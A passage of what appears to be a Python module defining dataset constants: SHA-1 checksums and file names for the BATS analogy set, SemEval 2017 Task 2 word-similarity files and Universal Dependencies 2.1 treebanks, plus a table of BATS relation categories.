'BATS_3.0/4_Lexicographic_semantics/L09 [antonyms - gradable].txt':\n '117fbb86504c192b33a5469f2f282e741d9c016d',\n 'BATS_3.0/4_Lexicographic_semantics/L10 [antonyms - binary].txt':\n '3cde2f2c2a0606777b8d7d11d099f316416a7224'}\n\nBATS_CATEGORIES = {\n 'I01': '[noun - plural_reg]',\n 'I02': '[noun - plural_irreg]',\n 'I03': '[adj - comparative]',\n 'I04': '[adj - superlative]',\n 'I05': '[verb_inf - 3pSg]',\n 'I06': '[verb_inf - Ving]',\n 'I07': '[verb_inf - Ved]',\n 'I08': '[verb_Ving - 3pSg]',\n 'I09': '[verb_Ving - Ved]',\n 'I10': '[verb_3pSg - Ved]',\n 'D01': '[noun+less_reg]',\n 'D02': '[un+adj_reg]',\n 'D03': '[adj+ly_reg]',\n 'D04': '[over+adj_reg]',\n 'D05': '[adj+ness_reg]',\n 'D06': '[re+verb_reg]',\n 'D07': '[verb+able_reg]',\n 'D08': '[verb+er_irreg]',\n 'D09': '[verb+tion_irreg]',\n 'D10': '[verb+ment_irreg]',\n 'E01': '[country - capital]',\n 'E02': '[country - language]',\n 'E03': '[UK_city - county]',\n 'E04': '[name - nationality]',\n 'E05': '[name - occupation]',\n 'E06': '[animal - young]',\n 'E07': '[animal - sound]',\n 'E08': '[animal - shelter]',\n 'E09': '[things - color]',\n 'E10': '[male - female]',\n 'L01': '[hypernyms - animals]',\n 'L02': '[hypernyms - misc]',\n 'L03': '[hyponyms - misc]',\n 'L04': '[meronyms - substance]',\n 'L05': '[meronyms - member]',\n 'L06': '[meronyms - part]',\n 'L07': '[synonyms - intensity]',\n 'L08': '[synonyms - exact]',\n 'L09': '[antonyms - gradable]',\n 'L10': '[antonyms - binary]'\n}\n\nSEMEVAL17_CHECKSUMS = \\\n {'SemEval17-Task2/README.txt':\n 'ad02d4c22fff8a39c9e89a92ba449ec78750af6b',\n 'SemEval17-Task2/task2-scorer.jar':\n '145ef73ce955656d59e3b67b41f8152e8ee018d8',\n 'SemEval17-Task2/test/subtask1-monolingual/data/de.test.data.txt':\n '6fc840f989d2274509549e472a68fb88dd2e149f',\n 'SemEval17-Task2/test/subtask1-monolingual/data/en.test.data.txt':\n '05293fcbd80b2f4aad9b6518ce1a546ad8f61f33',\n 'SemEval17-Task2/test/subtask1-monolingual/data/es.test.data.txt':\n '552904b5988f9951311290ca8fa0441dd4351d4b',\n 'SemEval17-Task2/test/subtask1-monolingual/data/fa.test.data.txt':\n '29d5970feac5982961bd6ab621ba31f83d3bff77',\n 'SemEval17-Task2/test/subtask1-monolingual/data/it.test.data.txt':\n 'c95fe2be8fab37e9c70610117bdedc48a0a8e95c',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/de.test.gold.txt':\n 'c51463460495a242cc726d41713c5e00b66fdd18',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/en.test.gold.txt':\n '2d2bb2ed41308cc60e7953cc9036f7dc89141b48',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/es.test.gold.txt':\n 'a5842ff17fe3847d15414924826a8eb236018bcc',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/fa.test.gold.txt':\n '717bbe035d8ae2bad59416eb3dd4feb7238b97d4',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/it.test.gold.txt':\n 'a342b950109c73afdc86a7829e17c1d8f7c482f0',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-es.test.data.txt':\n 'ef92b1375762f68c700e050d214d3241ccde2319',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-fa.test.data.txt':\n '17aa103981f3193960309bb9b4cc151acaf8136c',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-it.test.data.txt':\n 'eced15e8565689dd67605a82a782d19ee846222a',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-de.test.data.txt':\n '5cb69370a46385a7a3d37cdf2018744be77203a0',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-es.test.data.txt':\n '402f7fed52b60e915fb1be49f935395488cf7a7b',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-fa.test.data.txt':\n '9bdddbbde3da755f2a700bddfc3ed1cd9324ad48',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-it.test.data.txt':\n 'd3b37aac79ca10311352309ef9b172f686ecbb80',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/es-fa.test.data.txt':\n 'a2959aec346c26475a4a6ad4d950ee0545f2381e',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/es-it.test.data.txt':\n 'ca627c30143d9f82a37a8776fabf2cee226dd35c',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/it-fa.test.data.txt':\n 'a03d79a6ce7b798356b53b4e85dbe828247b97ef',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-es.test.gold.txt':\n '7564130011d38daad582b83135010a2a58796df6',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-fa.test.gold.txt':\n 'c9e23c2e5e970e7f95550fbac3362d85b82cc569',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-it.test.gold.txt':\n 'b74cc2609b2bd2ceb5e076f504882a2e0a996a3c',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-de.test.gold.txt':\n '428dfdad2a144642c13c24b845e6b7de6bf5f663',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-es.test.gold.txt':\n '1dd7ab08a10552486299151cdd32ed19b56db682',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-fa.test.gold.txt':\n '17451ac2165aa9b695dae9b1aba20eb8609fb400',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-it.test.gold.txt':\n '5041c0b84a603ed85aa0a5cbe4b1c34f69a2fa7c',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/es-fa.test.gold.txt':\n '8c09a219670dc32ab3864078bf0c28a287accabc',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/es-it.test.gold.txt':\n 'b1cdd13209354cc2fc2f4226c80aaa85558daf4a',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/it-fa.test.gold.txt':\n 'e0b560bb1d2db39ce45e841c8aad611734dc94f1',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/de.trial.data.txt':\n 'dd071fd90f59bec8d271a447d86ee2e462941f52',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/en.trial.data.txt':\n 'e8e5add0850b3dec07f102be26b8791a5e9bbbcf',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/es.trial.data.txt':\n '8956c78ff9ceae1d923a57816e55392c6a7dfc49',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/fa.trial.data.txt':\n '2f7c4247cde0d918b3508e90f6b49a1f5031c81b',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/it.trial.data.txt':\n 'c11e0b5b55f94fc97c7b11fa455e71b071be879f',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/de.trial.gold.txt':\n 'ce5567b1accf3eb07da53229dfcb2a8a1dfac380',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/en.trial.gold.txt':\n '693cb5928e807c79e39136dc0981dadca7832ae6',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/es.trial.gold.txt':\n '8241ca66bf5ba55f77607e9bcfae8e34902715d8',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/fa.trial.gold.txt':\n 'd30701a93c8c5500b82ac2334ed8410f9a23864b',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/it.trial.gold.txt':\n 'bad225573e1216ba8b35429e9fa520a20e8ce031',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/de.trial.sample.output.txt':\n 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/en.trial.sample.output.txt':\n 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/es.trial.sample.output.txt':\n 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/fa.trial.sample.output.txt':\n 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/it.trial.sample.output.txt':\n 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-es.trial.data.txt':\n 'c27c8977d8d4434fdc3e59a7b0121d87e0a03237',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-fa.trial.data.txt':\n '88a6f6dd1bba309f7cae7281405e37f442782983',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-it.trial.data.txt':\n 'ebdab0859f3b349fa0120fc8ab98be3394f0d73d',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-de.trial.data.txt':\n '128d1a460fe9836b66f0fcdf59455b02edb9f258',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-es.trial.data.txt':\n '508c5dde8ffcc32ee3009a0d020c7c96a338e1d1',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-fa.trial.data.txt':\n '1a3640eb5facfe15b1e23a07183a2e62ed80c7d9',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-it.trial.data.txt':\n '141c83d591b0292016583d9c23a2cc5514a006aa',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/es-fa.trial.data.txt':\n 'a0a548cd698c389ee80c34d6ec72abed5f1625e5',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/es-it.trial.data.txt':\n '8d42bed8a43ff93d26ca95794758d9392ca707ed',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/it-fa.trial.data.txt':\n '9c85223f1f734de61c28157df0ce417bb0537803',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-es.trial.gold.txt':\n '126c92b2fb3b8f2784dd4ae2a4c52b02a87a8196',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-fa.trial.gold.txt':\n '1db6201c2c8f19744c39dbde8bd4a803859d64c1',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-it.trial.gold.txt':\n '5300bf2ead163ff3981fb41ec5d0e291c287c9e0',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-de.trial.gold.txt':\n 'd4f5205de929bb0c4020e1502a3f2204b5accd51',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-es.trial.gold.txt':\n '3237e11c3a0d9c0f5d583f8dc1d025b97a1f8bfe',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-fa.trial.gold.txt':\n 'c14de7bf326907336a02d499c9b92ab229f3f4f8',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-it.trial.gold.txt':\n '3c0276c4b4e7a6d8a618bbe1ab0f30ad7b07929c',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-fa.trial.gold.txt':\n '359f69e9dfd6411a936baa3392b8f05c398a7707',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-it.trial.gold.txt':\n '44090607fabe5a26926a384e521ef1317f6f00d0',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/it-fa.trial.gold.txt':\n '97b09ffa11803023c2143fd4a4ac4bbc9775e645',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-es.trial.sample.output.txt':\n 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-fa.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-it.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-de.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-es.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-fa.trial.sample.output.txt':\n 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-it.trial.sample.output.txt':\n 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/es-fa.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/es-it.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/it-fa.trial.sample.output.txt':\n 'a0735361a692be357963959728dacef85ea08240'}\n\nUD21_DATA_FILE_SHA1 = \\\n {'af': {'dev': ('af-ud-dev.conllu',\n 'e37b104f4425ee00afc81779201816d5ac525194'),\n 'test': ('af-ud-test.conllu',\n 'd2bf02370d308ee957c04242bd0871db0e488389'),\n 'train': ('af-ud-train.conllu',\n 'a652c7b19c236063d3ea489947f83095893b699a')},\n 'grc_proiel': {'dev': ('grc_proiel-ud-dev.conllu',\n 'd199530c7e40ff0214e510957bb126af0dc12c1c'),\n 'test': ('grc_proiel-ud-test.conllu',\n 'bb7825ddeb18fc2d86638e4725f04563f3e08aab'),\n 'train': ('grc_proiel-ud-train.conllu',\n 'fe6c861299b033abe8c4ce2b6131cd74f87b96a7')},\n 'grc': {'dev': ('grc-ud-dev.conllu',\n 'debdfec0272cd558ccd29fe0ae2f13175dd20a33'),\n 'test': ('grc-ud-test.conllu',\n 'f19accf31db95e2c736d716d3438c09aa877eb07'),\n 'train': ('grc-ud-train.conllu',\n 'e98d3eabea67787c5d43a498f5a0fa4246f38104')},\n 'ar_nyuad': {'dev': ('ar_nyuad-ud-dev.conllu',\n 'b740de9bd68e68b30b9b313eb050d44e94470ca5'),\n 'test': ('ar_nyuad-ud-test.conllu',\n 'f5d5b8979b7fedd76235d4bae77e0b4a7b0a750a'),\n 'train': ('ar_nyuad-ud-train.conllu',\n 'd065f03958fd8782a7431b6778c6665ad09444a6')},\n 'ar_pud': {'test': ('ar_pud-ud-test.conllu',\n '2161701e6726b6feb14733a312fba6160b9eb722')},\n 'ar': {'dev': ('ar-ud-dev.conllu',\n '5f8964974d5ba5eb3504cdafb93c34c473c4177c'),\n 'test': ('ar-ud-test.conllu',\n '58df161047f310cc3bb4d0e615ca33466e630bb9'),\n 'train': ('ar-ud-train.conllu',\n '0a3d5cefa1fecd6a74f2016ee73ea7a7a02eb359')},\n 'eu': {'dev': ('eu-ud-dev.conllu',\n '3ee15b5ed46ec93d7278c8cc0351d242417d553d'),\n 'test': ('eu-ud-test.conllu',\n 'aa68d6442ac6dc1abedc19c1b98c4a9944786188'),\n 'train': ('eu-ud-train.conllu',\n 'd56ec997916e38ee6ab1badd78c119e81e4797c9')},\n 'be': {'dev': ('be-ud-dev.conllu',\n '015473e91cf8937c46e8b721f206415abac16a35'),\n 'test': ('be-ud-test.conllu',\n 'f009ea1885f54cfd77fca8a2c89133b2af8f9f5e'),\n 'train': ('be-ud-train.conllu',\n '26b871e28d2f356a709f106b6e3e86b417ba74e7')},\n 'bg': {'dev': ('bg-ud-dev.conllu',\n '0a2284b10547681eb65691eb2a9f0f1662e16e90'),\n 'test': ('bg-ud-test.conllu',\n '75ea2a5e1d55bb57efecae6ec2b5ac3cc1b37e57'),\n 'train': ('bg-ud-train.conllu',\n 'd4b2fa267010c4486885c91f3af65ff66c8be94c')},\n 'bxr': {'sample': ('bxr-ud-sample.conllu',\n '9239bdd251a60820c71111ec54de9e7d58a8579d'),\n 'test': ('bxr-ud-test.conllu',\n '0a06e527454ae0b547153222f67eb5db94e528fd')},\n 'yue': {'test': ('yue-ud-test.conllu',\n 'd91477c65aa75cd45489cca13f7a122066972bdb')},\n 'ca': {'dev': ('ca-ud-dev.conllu',\n '5737824f0afff0d07a43db331f102d62c6da2d96'),\n 'test': ('ca-ud-test.conllu',\n '0e28bd2a3b982515c1158194ad52bcbbe741e170'),\n 'train': ('ca-ud-train.conllu',\n 'b5ff2392722d4a1df3bfc52fa5b8f2043b7aec0c')},\n 'zh_cfl': {'test': ('zh_cfl-ud-test.conllu',\n '32fe45cd0e4e11ced95202971bce74acbc6a8c30')},\n 'zh_hk': {'test': ('zh_hk-ud-test.conllu',\n '4c75fa5bbcdcb181447b4e037224d50feb2776fb')},\n 'zh_pud': {'test': ('zh_pud-ud-test.conllu',\n 'b3e448884b7b6229379f9723b97c6e9a6fedcb61')},\n 'zh': {'dev': ('zh-ud-dev.conllu',\n '34d8253b35ad2245d59ddffa71b5689ef267b6b2'),\n 'test': ('zh-ud-test.conllu',\n '0f00516097650c12262298dd0fbd1b17a6d2bfe2'),\n 'train': ('zh-ud-train.conllu',\n '9444eec5f4561f289ad140e47e49013689512a65')},\n 'cop': {'dev': ('cop-ud-dev.conllu',\n '863d1004df1a92df52515105f6fae6ff68539595'),\n 'test': ('cop-ud-test.conllu',\n 'd3b33566679f071d4ad622ad840cd98381835706'),\n 'train': ('cop-ud-train.conllu',\n '33d0e5de5d6077f7c52a4cd90bce0047f3e9ff6f')},\n 'hr': {'dev': ('hr-ud-dev.conllu',\n '8da2a419980807d2e91e09b6bf496e58d442b0ba'),\n 'test': ('hr-ud-test.conllu',\n '49d673cba3d32d39d413e557276a45a0214ed83e'),\n 'train': ('hr-ud-train.conllu',\n 'e5cc686bb46c80c84c3ac60ed459e1f124c04c08')},\n 'cs_cac': {'dev': ('cs_cac-ud-dev.conllu',\n '69dfed28c29146b41a3428f4715bde70a6aecf00'),\n 'test': ('cs_cac-ud-test.conllu',\n 'a994b33ebbde486c1818a9df460fb112055e95de'),\n 'train': ('cs_cac-ud-train.conllu',\n '694f8559471dc481612606bf5df078daa094a84e')},\n 'cs_cltt': {'dev': ('cs_cltt-ud-dev.conllu',\n 'f35d5dbe57cd95760901ea29de4f493d5d2a44d4'),\n 'test': ('cs_cltt-ud-test.conllu',\n 'a8f6696785e658471f759bc736b738a105cba9a3'),\n 'train': ('cs_cltt-ud-train.conllu',\n 'ab97886066bfa462e5da03d25f802489292c0b56')},\n 'cs_fictree': {'dev': ('cs_fictree-ud-dev.conllu',\n 'dc67c07737a3a8bf2633068941f2d55f1500e192'),\n 'test': ('cs_fictree-ud-test.conllu',\n '06becaedef1cfdb8e1b2dce3f0d3a3a607d178a4'),\n 'train': ('cs_fictree-ud-train.conllu',\n 'fe7dbe3a0e6ee73e19e788c43bbb8f8f47ae1645')},\n 'cs_pud': {'test': ('cs_pud-ud-test.conllu',\n '9f205677041de694157ba2ef3e1eadb44d467f2f')},\n 'cs': {'dev': ('cs-ud-dev.conllu',\n 'd609e895b21b8710337e23a98b58ffd7b7a54bf1'),\n 'test': ('cs-ud-test.conllu',\n '34091286a11b1ce2a9c8bcfa03fdd86fb0e13965'),\n 'train': ('cs-ud-train.conllu',\n 'd1f855798a29d433b580d01ade0d8d062cd58534')},\n 'da': {'dev': ('da-ud-dev.conllu',\n '2c0c798c20a2efb30273172d388342a82bb0ce3c'),\n 'test': ('da-ud-test.conllu',\n '85a95a8527f8773f1575ceaf0ab51f204b211047'),\n 'train': ('da-ud-train.conllu',\n 'b653c029a7ae5c106f865dcef949fb3fe2aa0420')},\n 'nl_lassysmall': {'dev': ('nl_lassysmall-ud-dev.conllu',\n '2a169af74c2206c9073c3932b4a300492a314ee5'),\n 'test': ('nl_lassysmall-ud-test.conllu',\n '39f08896a40ad370f2acc37d58689cdc43a660a9'),\n 'train': ('nl_lassysmall-ud-train.conllu',\n 'e4fd6bac246c81bb17a3c932e251b8662739cc19')},\n 'nl': {'dev': ('nl-ud-dev.conllu',\n '33a9387eef9f5c0b15bd1e76e78776863f1f6d90'),\n 'test': ('nl-ud-test.conllu',\n '01b3e1048792c851fdd59882c353fcdb76dc165e'),\n 'train': ('nl-ud-train.conllu',\n '8e6a10152b7d09ce61433dd5f715ab2401611cf6')},\n 'en_lines': {'dev': ('en_lines-ud-dev.conllu',\n '83b63b7670ea4394b558bc26e16a004339f0a0ef'),\n 'test': ('en_lines-ud-test.conllu',\n 'ccc9d3c71a873313d138c3adb12405a97eb270d8'),\n 'train': ('en_lines-ud-train.conllu',\n 'da42bfac9fd97d98ebbbc37c65d83ff4c53b4e79')},\n 'en_pud': {'test': ('en_pud-ud-test.conllu',\n '4a9c83ba058a7e51979af790ba0440cc274b948f')},\n 'en_partut': {'dev': ('en_partut-ud-dev.conllu',\n '863a6f571158acaaca95223e50bd08fc0c1134f0'),\n 'test': ('en_partut-ud-test.conllu',\n '0c0780b0f14e4623f1014e6496d639cd2d2f6ffd'),\n 'train': ('en_partut-ud-train.conllu',\n 'e00a2d6f7efa28c8aaa40dccdf29b59a50f48e18')},\n 'en': {'dev': ('en-ud-dev.conllu',\n 'e2159dda4400d289ad8a403b466c8d23d733ba35'),\n 'test': ('en-ud-test.conllu',\n 'bd36ef23f76155625b379d063427bd62f19b7658'),\n 'train': ('en-ud-train.conllu',\n '993c44f62104971fe2d056847349facbb7986258')},\n 'et': {'dev': ('et-ud-dev.conllu',\n '312f9477f7ee1dd380c1fbcf77a6f0c63476fdbb'),\n 'test': ('et-ud-test.conllu',\n 'd70907f0771b41a27406672b9d91043a0954f946'),\n 'train': ('et-ud-train.conllu',\n 'b6d788e7a3362d0984d1cff06c1ba3d66f6bf773')},\n 'fi_ftb': {'dev': ('fi_ftb-ud-dev.conllu',\n '552ec574acdb3209e7545af4e16a43a1e2956979'),\n 'test': ('fi_ftb-ud-test.conllu',\n '13c34838a0fa9e379f9624ed1f4c368ca50a7d98'),\n 'train': ('fi_ftb-ud-train.conllu',\n '73d025250bfc82a24181b5ed601dc4ae7c8e846c')},\n 'fi_pud': {'test': ('fi_pud-ud-test.conllu',\n '4ab7b0d99ce6697d79732e401be97585a28c2afa')},\n 'fi': {'dev': ('fi-ud-dev.conllu',\n 'e023cf7eaffbda20bd4518d87fe9086207bb5361'),\n 'test': ('fi-ud-test.conllu',\n 'fd57c5106e43994250f4472890572bdbb8b4a48b'),\n 'train': ('fi-ud-train.conllu',\n 'ab27bda8cbb62886196b78de87985a4c6cf8215d')},\n 'fr_ftb': {'dev': ('fr_ftb-ud-dev.conllu',\n '71b3cc02601f64711f98e33a6b2af10aa00700be'),\n 'test': ('fr_ftb-ud-test.conllu',\n '723b8c44e74202a18b7e71268b738a5e1aa15f86'),\n 'train': ('fr_ftb-ud-train.conllu',\n '9a347120478254647deb7c7e02871b28aad23ec4')},\n 'fr_pud': {'test': ('fr_pud-ud-test.conllu',\n '570b7e31dc359ed62123bea6546efa13cfc2cf25')},\n 'fr_partut': {'dev': ('fr_partut-ud-dev.conllu',\n '1505030048829a8dccc466cc86bca057996301ae'),\n 'test': ('fr_partut-ud-test.conllu',\n 'f6446317c9f82cc0b70a76be75282804a3359ac0'),\n 'train': ('fr_partut-ud-train.conllu',\n 'f87c246cfa91186b90c7780cb64783034f196622')},\n 'fr_sequoia': {'dev': ('fr_sequoia-ud-dev.conllu',\n '859b10d80c7b3a382571cce9b2620039673539d1'),\n 'test': ('fr_sequoia-ud-test.conllu',\n 'be0ef69e392e64030414748da2995433f23e033d'),\n 'train': ('fr_sequoia-ud-train.conllu',\n '48ac01913518888a32670a687123ed1bac57e0e9')},\n 'fr': {'dev': ('fr-ud-dev.conllu',\n '5de0aee778bcc69d14285ada88f0ff7e5ac0a0cd'),\n 'test': ('fr-ud-test.conllu',\n 'd20a014acd38193155a33a5233c13f89541c78c3'),\n 'train': ('fr-ud-train.conllu',\n 'feee0cc85a2d7dcb3397399ef22c8af8ef75420b')},\n 'gl_treegal': {'dev': ('gl_treegal-ud-dev.conllu',\n '272558614cff4a5e1f2805626904e6dc488b8d25'),\n 'test': ('gl_treegal-ud-test.conllu',\n '18d99474d3aa9c83878c42a79d7881330dd9b861'),\n 'train': ('gl_treegal-ud-train.conllu',\n 'b1691dd5f587a19eb9dc6f141ecbd3eec3bb0e07')},\n 'gl': {'dev': ('gl-ud-dev.conllu',\n 'e72390dce9bf973442deef31ed0cd7a975361fe5'),\n 'test': ('gl-ud-test.conllu',\n '7d82ba3672bd4427674428e1dcbcae4feebc3aeb'),\n 'train': ('gl-ud-train.conllu',\n 'd586e7bffa314f8c5b85288e060e68dddc1f5d33')},\n 'de_pud': {'test': ('de_pud-ud-test.conllu',\n '2c91e42b7345145290b68385ff5270910048b8c4')},\n 'de': {'dev': ('de-ud-dev.conllu',\n '9b4f49bfa2b609d54369890d9e7d8d24a3c229af'),\n 'test': ('de-ud-test.conllu',\n '48f0f6f98b38710906481b5e9fe1d459d28f1b4a'),\n 'train': ('de-ud-train.conllu',\n '04a1d6a6a2da9d9c38496118e0432c9a6720db64')},\n 'got': {'dev': ('got-ud-dev.conllu',\n '501c47193ca2af5826e4afcc04941df87a7c47c3'),\n 'test': ('got-ud-test.conllu',\n 'cfcf16d562434987562bd1f5faa0d8c007e9ddb8'),\n 'train': ('got-ud-train.conllu',\n 'b4951ede89d947c6617df782ac248566235f78fb')},\n 'el': {'dev': ('el-ud-dev.conllu',\n '9df0919ed6f9dcab3ba3f60f0ad31d0c79ae6cdb'),\n 'test': ('el-ud-test.conllu',\n '1bb4a6b24521f0c3c7d6cf71e2456ef3a1ee31aa'),\n 'train': ('el-ud-train.conllu',\n '32f4abc821624c4cd4d3b3b555c1558f06366e2c')},\n 'he': {'dev': ('he-ud-dev.conllu',\n 'c5b76874fcf11c7733e1555957bb49e8298af140'),\n 'test': ('he-ud-test.conllu',\n '4fbe4115948250fc2e42dd43399d1c6c11ddcfd2'),\n 'train': ('he-ud-train.conllu',\n 'eae49a515b38d224b109138bf006a112e80a7caf')},\n 'hi_pud': {'test': ('hi_pud-ud-test.conllu',\n 'd237fecc594186e7a52ad33313ac52e927905d73')},\n 'hi': {'dev': ('hi-ud-dev.conllu',\n '48b592bb1aa1cbc30d41d2913421cfd3f9d2c790'),\n 'test': ('hi-ud-test.conllu',\n '004a7fdde368f32f9f230bc5e2cf4ce9e1d8f8d7'),\n 'train': ('hi-ud-train.conllu',\n '9be8afb2cabda361817c55b3de6ebba2c3fef7e0')},\n 'hu': {'dev': ('hu-ud-dev.conllu',\n 'ec622e6bcf2a84b0b47eba0de01cf5768157a50e'),\n 'test': ('hu-ud-test.conllu',\n 'fd717d25add38c2fb2dc8e82e2f9e5b0b9f3c5b8'),\n 'train': ('hu-ud-train.conllu',\n 'e5486523a8bebe40d633ad8b4050be8a3d11c78a')},\n 'id': {'dev': ('id-ud-dev.conllu',\n '7b181aa954a4f4b22b80a18e4f67cbf423e9c701'),\n 'test': ('id-ud-test.conllu',\n '357ed8c216725760bf5be561ed6e918ce602b5ac'),\n 'train': ('id-ud-train.conllu',\n '328ea588b75de55ef48373c2bf9983bca277d724')},\n 'ga': {'dev': ('ga-ud-dev.conllu',\n '180a1a9dcfcec6528a559032c67e9a15693a039d'),\n 'test': ('ga-ud-test.conllu',\n 'b74a56372af3f68f089ea82ba858e5a82aae4e22'),\n 'train': ('ga-ud-train.conllu',\n '40df0b12fbadae6e56c0a01da483d6c612d9450c')},\n 'it_pud': {'test': ('it_pud-ud-test.conllu',\n 'c7121c03dbdc7d27f89c6f6dd8f046b89233438e')},\n 'it_partut': {'dev': ('it_partut-ud-dev.conllu',\n '0bb5dc0c0815212c9832eaef3b802cf885e0543b'),\n 'test': ('it_partut-ud-test.conllu',\n 'b5eccd3d9a94a2f96c8c3a6e4192a287ac563898'),\n 'train': ('it_partut-ud-train.conllu',\n '784b18bf8d3b59d967d147075a3cb5b03fb28637')},\n 'it_postwita': {'dev': ('it_postwita-ud-dev.conllu',\n '07f6f658246aa070e2166e688f7569d61aafff54'),\n 'test': ('it_postwita-ud-test.conllu',\n 'c2d58f50e51d37cb5f55bd0a3129138e95a72a8a'),\n 'train': ('it_postwita-ud-train.conllu',\n '69684c47fba99230f6ef1a204b95c37d28eaa5a6')},\n 'it': {'dev': ('it-ud-dev.conllu',\n 'ea8fd59f36280fbd77b9a807959491636048a698'),\n 'test': ('it-ud-test.conllu',\n '34839fdeeef883f8034c723a18772947106cec6b'),\n 'train': ('it-ud-train.conllu',\n 'a0cae413f46a344366f86bc7ffe4f5d7ecbf6a14')},\n 'ja_pud': {'test': ('ja_pud-ud-test.conllu',\n '4c914016a0968ca434348370d38c9579a60e8fd7')},\n 'ja': {'dev': ('ja-ud-dev.conllu',\n '21f06fef7fbeccd05a298385bf40f8b4ffe95146'),\n 'test': ('ja-ud-test.conllu',\n '240d3532698356a7c6f93c3215718ef2f66a672f'),\n 'train': ('ja-ud-train.conllu',\n '35eaf307d94c2006241fe08f745d7b1b17f049cf')},\n 'kk': {'dev': ('kk-ud-dev.conllu',\n '038033c822b407040a4ecb87c077506cd0d1a322'),\n 'test': ('kk-ud-test.conllu',\n '4124bcaa6e4fc132613d94a882abcff8ecad8ca0'),\n 'train': ('kk-ud-train.conllu',\n '48d664d273ad6731cb65228ce9b57ad3cf50f7f5')},\n 'ko': {'dev': ('ko-ud-dev.conllu',\n '60e7da7cca44c923873a062e80262726659f5528'),\n 'test': ('ko-ud-test.conllu',\n 'bc9a0fc4ddfed14b70bb58048bf8b8d50062cffd'),\n 'train': ('ko-ud-train.conllu',\n 'ee21328f9ea39668e802f0cb6a794358f5c256bf')},\n 'kmr': {'sample': ('kmr-ud-sample.conllu',\n 'd76d631400d17b63b9592ce3c0f4ecada012d6d0'),\n 'test': ('kmr-ud-test.conllu',\n '606a338db2d6adde6b4d7d8c9ee2bdf1f988d729')},\n 'la_ittb': {'dev': ('la_ittb-ud-dev.conllu',\n 'd9f17992bd0258a734aea9b6c53759039717c86a'),\n 'test': ('la_ittb-ud-test.conllu',\n 